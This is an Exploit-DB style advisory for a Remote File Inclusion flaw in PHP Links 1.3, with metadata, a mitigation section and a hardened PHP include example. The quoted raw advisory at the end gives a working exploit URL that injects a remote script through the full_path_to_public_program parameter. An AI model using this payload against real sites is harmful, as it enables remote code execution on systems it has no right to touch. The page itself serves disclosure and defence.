vendor: PHP Links
by: Houssamix From H-T Team
CVSS: 9.3 HIGH
Remote File Inclusion Vulnerability
CWE: 98
Product Name: PHP Links
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: YES
Related CWE: N/A
CPE: a:deltascripts:php_links
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP Links from DeltaScripts <= 1.3

A Remote File Inclusion (RFI) vulnerability exists in PHP Links from DeltaScripts version 1.3 and earlier. The vulnerability is due to the application including files based on user-supplied input without proper validation. An attacker can exploit this vulnerability to include arbitrary remote files, resulting in the execution of arbitrary code on the vulnerable system.

Mitigation:

To mitigate this vulnerability, ensure that user-supplied input is properly validated before being used to include files.
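
A hardened shape for the `require` in /includes/smarty.php that the raw advisory below quotes. This is an added example, not DeltaScripts code or the vendor's patch. The constant `PHPLINKS_ENTRY` and the helper `safe_include_path()` are hypothetical names, and PHP 7.1 or later is assumed.

```php
<?php
// Added example, not DeltaScripts code: a hardened shape for includes/smarty.php.
// PHPLINKS_ENTRY and safe_include_path() are hypothetical names.

// Vulnerable form quoted in the advisory (the path prefix is request-controlled):
//   require($full_path_to_public_program . "/admin/libs/Smarty.class.php");

// 1. Refuse direct HTTP requests. Legitimate entry scripts would run
//    define('PHPLINKS_ENTRY', true); before including this file.
if (!defined('PHPLINKS_ENTRY')) {
    http_response_code(403);
    exit('Forbidden');
}

/**
 * Resolve $relative under $base and return the canonical path, or null if it
 * is missing, not a regular file, or resolves outside $base.
 */
function safe_include_path(string $base, string $relative): ?string
{
    // Reject URL schemes and stream wrappers (http://, ftp://, php://, data:).
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative) === 1) {
        return null;
    }
    $root = realpath($base);
    $path = realpath($base . DIRECTORY_SEPARATOR . $relative);
    if ($root === false || $path === false || !is_file($path)) {
        return null;
    }
    // The canonical path must still sit under the canonical base directory.
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// 2. Take the base directory from this file's own location, never from a
//    variable that a request can set.
$smarty = safe_include_path(dirname(__DIR__), 'admin/libs/Smarty.class.php');
if ($smarty === null) {
    error_log('smarty.php: Smarty.class.php missing or outside application root');
    http_response_code(500);
    exit;
}
require $smarty;
```

Independently of the code change, keeping `allow_url_include` set to `Off` in php.ini stops `require` from fetching URLs at all.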
Source

Exploit-DB raw data:

-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

= Author : Houssamix From H-T Team                          
= Script : PHP Links from DeltaScripts <= 1.3         
                     
        
= Download : http://softadmin.deltascripts.com/download.php
             (PHP Links v1.3 Released 13.09.2007 ) 			 
           
= BUG :  Remote File Inclusion Vulnerability  

= Vulnerable Code : /includes/smarty.php   

require($full_path_to_public_program . "/admin/libs/Smarty.class.php"); <= Line 2

= Exploit :                                                  
http://target/phplinks/includes/smarty.php?full_path_to_public_program=Evil_script


-------------------------------------------------------------
= Greetz : CoNaN - Stack-Terrorist - Gold_M - Rachidox
-------------------------------------------------------------

# milw0rm.com [2008-01-30]